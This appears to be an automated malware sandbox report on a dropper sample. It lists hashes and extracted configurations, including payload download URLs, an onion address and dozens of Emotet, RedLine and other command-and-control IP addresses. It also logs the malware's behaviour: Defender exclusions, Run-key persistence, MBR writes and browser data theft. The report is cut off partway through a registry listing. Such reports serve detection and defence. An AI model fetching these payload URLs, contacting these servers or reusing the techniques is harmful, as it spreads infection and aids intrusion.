Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-12-2024 11:42
Static task
static1
Behavioral task
behavioral1
Sample
UltraDropper.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
UltraDropper.exe
Resource
win11-20241007-en
General
-
Target
UltraDropper.exe
-
Size
2.1MB
-
MD5
214fa35854484aef6af117ca2a1aff67
-
SHA1
fb728281df40bdd9147ff2ccee66e42d6f96c3c6
-
SHA256
dbb91096405f222efa0a0733c5690c071b62194476b75793104c8b473dc2c2df
-
SHA512
4289f8a6820f4b072ba1fff8828bc1bc0988a6bfd3748d2f941fe53ab638bc5a5c2a2e85057db19918a811ce7ab9c73898d083de4892847f9d481253be755ddd
-
SSDEEP
49152:zW2vZKbn0KJrgcvZ4dvTrRpjgYhNWue0CJAom:dvZKrJ5vZ4drfgYOfK
Malware Config
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
-
payload_urls
https://raroford3242.xyz/myupdate.exe
https://raroford3242.xyz/Sklmsstregens.vbs, https://raroford3242.xyz/remcexecrypt.exe, https://raroford3242.xyz/redlcryp.exe, https://raroford3242.xyz/racoocry.exe
https://raroford3242.xyz/myupdate.exe
https://raroford3242.xyz/myupdate.exe
Extracted
emotet
Epoch5
178.238.225.252:8080
139.196.72.155:8080
36.67.23.59:443
103.56.149.105:8080
37.44.244.177:8080
85.25.120.45:8080
202.134.4.210:7080
78.47.204.80:443
83.229.80.93:8080
93.104.209.107:8080
80.211.107.116:8080
165.22.254.236:8080
104.244.79.94:443
185.148.169.10:8080
190.145.8.4:443
175.126.176.79:8080
139.59.80.108:8080
188.165.79.151:443
128.199.217.206:443
64.227.55.231:8080
218.38.121.17:443
103.71.99.57:8080
103.224.241.74:8080
128.199.242.164:8080
85.214.67.203:8080
103.254.12.236:7080
46.101.98.60:8080
178.62.112.199:8080
210.57.209.142:8080
195.77.239.39:8080
103.126.216.86:443
82.98.180.154:7080
202.28.34.99:8080
174.138.33.49:7080
160.16.143.191:8080
51.75.33.122:443
103.41.204.169:8080
186.250.48.5:443
87.106.97.83:7080
118.98.72.86:443
196.44.98.190:8080
103.85.95.4:8080
62.171.178.147:8080
54.37.228.122:443
114.79.130.68:443
198.199.70.22:8080
Extracted
redline
@dsadasdasd1
45.15.156.155:80
-
auth_value
e2637596f93702084676494f7e0c2dfd
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Emotet family
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Eternity family
-
Njrat family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Process spawned unexpected child process 27 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4768 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4616 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2896 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3144 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1944 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1888 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3792 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4828 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3052 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1380 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2664 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3964 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1028 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2172 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2340 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4356 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4572 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 660 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3872 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3600 2968 schtasks.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1172 2968 schtasks.exe 160 -
Raccoon family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2332-439-0x00000000107E0000-0x0000000010808000-memory.dmp family_redline -
Redline family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe -
resource yara_rule behavioral2/files/0x001c00000002abb4-171.dat dcrat behavioral2/memory/676-294-0x00000000001F0000-0x000000000033C000-memory.dmp dcrat behavioral2/files/0x0003000000025b9a-310.dat dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4656 powershell.exe 1892 powershell.exe 4388 powershell.exe 1980 powershell.exe 1648 powershell.exe 3340 powershell.exe 3032 powershell.exe 4768 powershell.exe 3844 powershell.exe 952 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" antivirus-platinum.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4864 netsh.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ecc7c8c51c0850c1ec247c7fd3602f20.exe windows.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ecc7c8c51c0850c1ec247c7fd3602f20.exe windows.exe -
Executes dropped EXE 59 IoCs
pid Process 4548 ud.curl.exe 4360 ud.7z.exe 2360 ud.curl.exe 4432 ud.7z.exe 1108 ud.curl.exe 3716 ud.7z.exe 572 ud.curl.exe 1568 ud.7z.exe 4572 ud.curl.exe 4132 ud.7z.exe 1396 ud.curl.exe 788 ud.7z.exe 4396 ud.curl.exe 3200 ud.7z.exe 2136 ud.curl.exe 4700 ud.7z.exe 1692 ud.curl.exe 2388 ud.7z.exe 4356 ud.curl.exe 2308 ud.7z.exe 1036 ud.curl.exe 1400 ud.7z.exe 2332 setup.eexe 840 Genshin Impact.exe 780 setup.exe 1448 [email protected] 4920 Worm (1).exe 2084 [email protected] 3948 Install.exe 2892 [email protected] 2860 is-DATM2.tmp 4728 0123b26df3c79bac0a3fda79072e36c159cfd1824ae3fd4b7f9dea9bda9c7909.exe 4752 302746537.exe 3132 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03.exe 1552 njRAT.exe 1788 048c0113233ddc1250c269c74c9c9b8e9ad3e4dae3533ff0412d02b06bdf4059.exe 2488 njRAT.exe 3640 njq8.exe 2380 0c722728ca1a996bbb83455332fa27018158cef21ad35dc057191a0353960256.exe 4764 windows.exe 4860 2106b6f94cebb55b1d55eb4b91fa83aef051c8866c54bb75ea4fd304711c4dfc.exe 676 PortwebSaves.exe 4892 263c18c86071d085c69f2096460c6b418ae414d3ea92c0c2e75ef7cb47bbe693.exe 1356 27e02b973771d43531c97eb5d3fb662f9247e85c4135fe4c030587a8dea72577.exe 3248 antivirus-platinum.exe 3968 2911be45ad496dd1945f95c47b7f7738ad03849329fcec9c464dfaeb5081f67e.exe 1204 47f3c8bf3329c2ef862cf12567849555b17b930c8d7c0d571f4e112dae1453b1.exe 660 516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e.exe 2116 5d66919291b68ab8563deedf8d5575fd91460d1adfbd12dba292262a764a5c99.exe 4888 62049575053b432e93b176da7afcbe49387111b3a3d927b06c5b251ea82e5975.exe 3032 7299026b22e61b0f9765eb63e42253f7e5d6ec4657008ea60aad220bbc7e2269.exe 2704 7322fbc16e20a7ef2a3188638014a053c6948d9e34ecd42cb9771bdcd0f82db0.exe 1420 99f510990f240215e24ef4dd1d22d485bf8c79f8ef3e963c4787a8eb6bf0b9ac.exe 3584 960ce3cc26c8313b0fe41197e2aff5533f5f3efb1ba2970190779bc9a07bea63.exe 3004 cmd.exe 5368 bd8c1068561d366831e5712c2d58aecb21e2dbc2ae7c76102da6b00ea15e259e.exe 5408 c6e669806594be6ab9b46434f196a61418484ba1eda3496789840bec0dff119a.exe 5420 e309a7a942d390801e8fedc129c6e3c34e44aae3d1aced1d723bc531730b08f5.exe 5476 f7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27.exe -
Loads dropped DLL 17 IoCs
pid Process 4360 ud.7z.exe 4432 ud.7z.exe 3716 ud.7z.exe 1568 ud.7z.exe 4132 ud.7z.exe 788 ud.7z.exe 3200 ud.7z.exe 4700 ud.7z.exe 2388 ud.7z.exe 2308 ud.7z.exe 1400 ud.7z.exe 4780 regsvr32.exe 3388 regsvr32.exe 3848 regsvr32.exe 708 regsvr32.exe 4372 regsvr32.exe 3248 antivirus-platinum.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ecc7c8c51c0850c1ec247c7fd3602f20 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\windows.exe\" .." windows.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ultradrp\\[email protected]" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\ecc7c8c51c0850c1ec247c7fd3602f20 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\windows.exe\" .." windows.exe -
Enumerates connected drives 3 TTPs 21 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\H: [email protected] File opened (read-only) \??\M: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\E: [email protected] File opened (read-only) \??\I: [email protected] File opened (read-only) \??\L: [email protected] File opened (read-only) \??\N: [email protected] File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\K: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\W: [email protected] -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
flow ioc 2 raw.githubusercontent.com 4 raw.githubusercontent.com 18 raw.githubusercontent.com 20 raw.githubusercontent.com 24 raw.githubusercontent.com 40 raw.githubusercontent.com 6 raw.githubusercontent.com 9 raw.githubusercontent.com 26 raw.githubusercontent.com 32 raw.githubusercontent.com 38 raw.githubusercontent.com 46 raw.githubusercontent.com -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com 47 ipinfo.io 49 api.db-ip.com 2 ipinfo.io 2 api.db-ip.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 [email protected] -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe -
resource yara_rule behavioral2/files/0x001900000002ac0e-245.dat upx behavioral2/memory/4752-257-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/4752-305-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/3248-307-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral2/memory/4752-316-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/3248-468-0x0000000000400000-0x000000000040D000-memory.dmp upx -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\Java\dllhost.exe PortwebSaves.exe File created C:\Program Files (x86)\Common Files\Java\5940a34987c991 PortwebSaves.exe File created C:\Program Files\Microsoft Office\cmd.exe PortwebSaves.exe File created C:\Program Files\Microsoft Office\ebf1f9fa8afd6d PortwebSaves.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\COMCTL32.OCX [email protected] File opened for modification C:\Windows\COMCTL32.OCX [email protected] File created C:\Windows\MSCOMCTL.OCX [email protected] File opened for modification C:\windows\antivirus-platinum.exe attrib.exe File created C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe PortwebSaves.exe File created C:\Windows\diagnostics\scheduled\cmd.exe PortwebSaves.exe File created C:\Windows\ServiceProfiles\NetworkService\29c1c3cc0f7685 PortwebSaves.exe File created C:\Windows\__tmp_rar_sfx_access_check_240653625 [email protected] File created C:\Windows\antivirus-platinum.exe [email protected] File opened for modification C:\Windows\antivirus-platinum.exe [email protected] File opened for modification C:\Windows\MSCOMCTL.OCX [email protected] File created C:\Windows\302746537.exe [email protected] File opened for modification C:\Windows\302746537.exe [email protected] -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Genshin Impact.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njRAT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0c722728ca1a996bbb83455332fa27018158cef21ad35dc057191a0353960256.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d66919291b68ab8563deedf8d5575fd91460d1adfbd12dba292262a764a5c99.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njq8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7299026b22e61b0f9765eb63e42253f7e5d6ec4657008ea60aad220bbc7e2269.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 302746537.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UltraDropper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0123b26df3c79bac0a3fda79072e36c159cfd1824ae3fd4b7f9dea9bda9c7909.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27e02b973771d43531c97eb5d3fb662f9247e85c4135fe4c030587a8dea72577.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 960ce3cc26c8313b0fe41197e2aff5533f5f3efb1ba2970190779bc9a07bea63.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windows.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7322fbc16e20a7ef2a3188638014a053c6948d9e34ecd42cb9771bdcd0f82db0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 47f3c8bf3329c2ef862cf12567849555b17b930c8d7c0d571f4e112dae1453b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Worm (1).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language is-DATM2.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 048c0113233ddc1250c269c74c9c9b8e9ad3e4dae3533ff0412d02b06bdf4059.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ud.curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language antivirus-platinum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 62049575053b432e93b176da7afcbe49387111b3a3d927b06c5b251ea82e5975.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main antivirus-platinum.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Main antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" antivirus-platinum.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\Implemented Categories regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\ToolboxBitmap32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D8B-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\Programmable regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F21-8591-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.ListViewCtrl\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E8C-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D90-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Control regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE5-8583-11D1-B16A-00C0F0283628}\ = "IToolbarEvents" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\MiscStatus regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A4-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877894-E026-11CF-8E74-00A0C90F26F8}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\ = "IProgressBar10" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\ = "IListItems" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D95-9D6A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F055-858B-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\Implemented Categories regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B7E6391-850A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) 